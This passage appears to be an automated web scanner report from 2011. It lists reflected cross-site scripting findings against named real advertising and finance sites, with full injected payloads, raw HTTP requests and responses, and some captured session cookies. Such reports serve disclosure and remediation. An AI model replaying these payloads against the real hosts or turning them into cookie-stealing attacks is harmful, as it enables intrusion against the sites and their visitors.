HTTP/1.1 404 Not Found Server: Lotus-Domino/5.0.7 Date: Sat, 05 Feb 2011 23:03:09 GMT Connection: close Content-Type: text/html; charset=US-ASCII Content-Length: 350 Expires: Tue, 01 Jan 1980 06:00:00 GMT Cache-control: no-cache
<HTML> <!-- Lotus-Domino (Release 5.0.7 - March 21, 2001 on OS/400) --> <HEAD> <TITLE>Error</TITLE></HEAD> <BODY TEXT="000000"> <H1>Error 404</H1>HTTP Web Server: Couldn't find design note - favicon.ico6e157<script>alert(1)</script>5c4cfcc19e5 <P> ...[SNIP]...
4.135. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mittelstandsblog.de.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10a08'-alert(1)-'be15936147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=12476&10a08'-alert(1)-'be15936147=1 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt/BHAxgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:42:57 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt/BHAxgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:42:57 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 17:42:57 GMT Connection: close Content-Length: 10840
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ea5f%3balert(1)//8bfd083d5b1 was submitted in the jscallback parameter. This input was echoed as 3ea5f;alert(1)//8bfd083d5b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1297012242449&refurl=http%3A%2F%2Fwww.mittelstandsblog.de%2F%3Fd18cb%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E02e0a7e96b%3D1&sid=58d2fde4057a419f8cd4ad4795d5a8b6&pvu=C3AF2E3D4E1146B8974E405F35226C60&pvm=8a7331184274a824066e86cbab026539&ipid=12476&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=6%2C12%2C18&pagecl=15442&jsoncl=9826&ppc=-1&hn=36&chunkkey=12476:58d2fde4057a419f8cd4ad4795d5a8b6:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Die%20Bedrohung%20durch%20einen%20m%25C3%25B6glichen%20Krieg%20der%20Computer%20%25E2%2580%2593%20den%20sogenannten%20Cyberwar%20%25E2%2580%2593%20erfordert%20nach%20Meinung%20des%20Branchenverbands%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22eine%20enge%20Kooperation%20staatlicher%20Stellen%20mit%20der%20ITK-Wirtschaft.%20Nicht%20von%20ungef%25C3%25A4hr%20ist%20Cyberwar%20in%20diesem%20Jahr%20Schwer%25C2%25ADpunkt%25C2%25ADthema%20der%20M%25C3%25BCnchner%20Sicherheitskonferenz.%20Prof.%20Dieter%20Kempf%20vom%20BITKOM-Pr%25C3%25A4%25C2%25ADsi%25C2%25ADdium%3A%20%25E2%2580%259EDer%20Schutz%20gegen%20Cyberattacken%20l%25C3%25A4sst%20sich%20rein%20milit%25C3%25A4risch%20nicht%20darstellen%2C%20da%20hier%20zivile%20und%20milit%25C3%25A4rische%20Sicherheit%20verschmelzen.%25E2%2580%259C%20Daher%20sei%20eine%20enge%20Zusammenarbeit%20zwischen%20zivilen%20und%20milit%25C3%25A4rischen%20Stellen%20unumg%25C3%25A4nglich.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22Die%20Reall%25C3%25B6hne%20stiegen%20in%20Deutschland%202010%20gegen%25C3%25BCber%20dem%20Vor%25C2%25ADjahr%20um%20durchschnittlich%201%2C4%C2%A0%2525.%20Das%20meldete%20heute%20das%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22.%20Damit%20kehrte%20sich%20die%20Entwicklung%20der%20Verdienste%20im%20Jahr%202009%20um.%20Vor%20zwei&chunk=0&total=10&jscallback=$iTXT.js.callback13ea5f%3balert(1)//8bfd083d5b1 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt+/NP3wA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sun, 06 Feb 2011 17:48:05 GMT Connection: close
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f9eec%3balert(1)//be4b7b0d465 was submitted in the callback parameter. This input was echoed as f9eec;alert(1)//be4b7b0d465 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_searchf9eec%3balert(1)//be4b7b0d465 HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:14 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWGJl7QqE309Lqf5eXifPARwpNoUujY2E+2KxY6QzBEF1jrMM9Le/5uS8vk3/0yfsC9LcwIQYqSX9iGj4pM2QhVMx+yQOJvlLcVJjMdcecy35E5O6HNzZmRmk3bTCYrYwTKa9T8x/sq7Uacd3idTy2Q70rTwd0fEIBEV/Ru0SliL9b/pLlazUTJc00i+uYgY9Ak75gw7U7vQBlsKmIETIL6DKGsRvXi6m0gPKikPNmAKkOGEwbxbrsiiIVOjmt5Bhh/y/4wfvoaYe/7LK/wxK91Hbfct4rQgUAT18IBlX2FsPJrdVKyNMroVM9A221zVtGOhn4JCqLeYFSsYGrdfEhGLOWFxM2Ig65OkOIDGI9mV9dqnUS6ne0WPIUjhR6aWQUA29ZRmmR4Xum34q41ZPj2mU6b5.WgeSdw8dF7NxJIHZwzf9uA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:14 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19362
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran ...[SNIP]... </html>\n","cb":"428"};ch_ad_render_searchf9eec;alert(1)//be4b7b0d465();
The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621be"><script>alert(1)</script>ac55a9221bd was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs621be"><script>alert(1)</script>ac55a9221bd&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:57 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJbIF4hBljrVeurtwIS0m4qSGm2e877NAI6f8fuEjdZOAXv/FnXqCC0BG566F0elAxvUHTaCTUEvE5ToHMsgNd2S8eAZISnLRZ3rquKZAszvJ+0ezAy5e+EgARK63ng5O6Yc3rDNZZ3kGv6nIxTOa/WNlsSBxecOT3xrb+mA307UyVs8w1PKXest+nN80acd9zQrTaMICnDQm2K4dEgk65gw1s5vQeW+lHSS0n1BuszD3QLaHFKor8P75FuQwV0enr980PLLkXwuK2YNi/oKG5lgiFYdu6PQzrh4AyikSl7jyWCHNvVp51KVAOaueFwgTVmH4n/Qrk2GivNs7S0NPCuW93M7YB21dbIS6ZlZqccuwMr0BUdgJ0/9K9UfRv2EWho293T2AfJgKGzBfcIdx9+SWEPjGoe2vx0S6ONyrcg==.RHUBxk7mgchYjm9uim6etg.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:57 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]... &cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs621be"><script>alert(1)</script>ac55a9221bd&callback=ch_ad_render_search" method="get" id="searchBox" name="searchBox"> ...[SNIP]...
The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload b63cd<script>alert(1)</script>161eef63f29 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gampad/ads?correlator=1296942576071&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-0829525646633902&slotname=ORTHO_Start_TopLeaderboardb63cd<script>alert(1)</script>161eef63f29&page_slots=ORTHO_Start_TopLeaderboard&cookie_enabled=1&ga_vid=1188681698.1296942576&ga_sid=1296942576&ga_hid=728612317&url=http%3A%2F%2Fwww.orthosupersite.com%2F&lmt=1296964176&dt=1296942576072&cc=14&biw=985&bih=1012&ifi=1&adk=3931591226&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.orthosupersite.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 21:51:26 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2764
GA_googleSetAdContentsBySlotForSync({"ORTHO_Start_TopLeaderboardb63cd<script>alert(1)</script>161eef63f29":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d556e'%3b0652dbe18d0 was submitted in the REST URL parameter 3. This input was echoed as d556e';0652dbe18d0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /anst/s/oiqrmb.jsd556e'%3b0652dbe18d0 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; gguuid=CAESEJ1QzO8syyE54_azrc6wYSw
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 Content-Type: application/x-javascript Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 22:58:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:58:57 GMT Connection: close Content-Length: 2278
function oiq_addPageMfg(s){ window.oiq_pMfg = s; } function oiq_addPageBrand(s){ window.oiq_pMfg = s; } function oiq_addPageDT(s) { if(!window.oiq_pDT) {window.oiq_pDT = new Array();} window.oiq_pDT.p ...[SNIP]... h('d|"'+encodeURIComponent(window.oiq_pDT[i])+'"')}} if (window.oiq_pProduct) t.push('p|"'+encodeURIComponent(window.oiq_pProduct)+'"'); } var req='http://px.owneriq.net/j/'+'?pt=oiqrmb.jsd556e';0652dbe18d0'+'&t='+encodeURI(t.join()); if (window.oiq_pSource) req+='&s='+window.oiq_pSource; oiq_is(req); },1000); }
function oiq_onclick(m,d,p,s,o) { if (!m && !d && !p) return true; win ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4892"%3balert(1)//f99faf2810f was submitted in the pt parameter. This input was echoed as a4892";alert(1)//f99faf2810f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /j/?pt=oiqrmba4892"%3balert(1)//f99faf2810f&t=m%7C%22owneriq%22&s=site HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; gguuid=CAESEJ1QzO8syyE54_azrc6wYSw
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:31:30 GMT Connection: close Content-Length: 1552
function isImageOk(img) { if (!img.complete) { return false; } if (typeof img.naturalWidth != 'undefined' && img.naturalWidth == 0) { return false; } return true; } var oiq_b = document.getElementsByT ...[SNIP]... cument.createElement("img"); oiq_i_1.setAttribute("src", "http://px.owneriq.net/p?sid%5B%5D=23331554&sid%5B%5D=53310589&sid%5B%5D=53310594&rid%5B%5D=862779&rid%5B%5D=1133555&rid%5B%5D=1133556&pt=oiqrmba4892";alert(1)//f99faf2810f"); oiq_i_1.setAttribute("width", "1"); oiq_i_1.setAttribute("height", "1"); oiq_f.appendChild(oiq_i_1); var oiq_i_2 = document.createElement("img"); oiq_i_2.setAttribute("src", "http://bid.openx.net/c ...[SNIP]...
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb85"><script>alert(1)</script>c67b70ca19 was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.cssbdb85"><script>alert(1)</script>c67b70ca19&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the img_prefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c2da"><script>alert(1)</script>79d70774517 was submitted in the img_prefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min9c2da"><script>alert(1)</script>79d70774517&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the img_prefix request parameter is copied into an HTML comment. The payload 521c9--><script>alert(1)</script>05eaf2114c1 was submitted in the img_prefix parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min521c9--><script>alert(1)</script>05eaf2114c1&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOREXYARD Live Forex ...[SNIP]... <img src="charts/35_30min521c9--><script>alert(1)</script>05eaf2114c1GRAPH_EURUSD_6_DAY_25.png" alt="Large Chart" border="0" /> ...[SNIP]...
4.145. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://quotes.forexyard.com
Path:
/iframe5.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98915"%3balert(1)//f9d420ddf1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98915";alert(1)//f9d420ddf1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=/98915"%3balert(1)//f9d420ddf1d4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FOREXYARD Live Forex ...[SNIP]... <script type="text/javascript">var aff_url = "http://www.forexyard.com/index.php?zone_id=/98915";alert(1)//f9d420ddf1d4129";</script> ...[SNIP]...
4.146. http://quotes.forexyard.com/iframe5.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://quotes.forexyard.com
Path:
/iframe5.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa17"><script>alert(1)</script>1c43b63a262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=/efa17"><script>alert(1)</script>1c43b63a2624129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
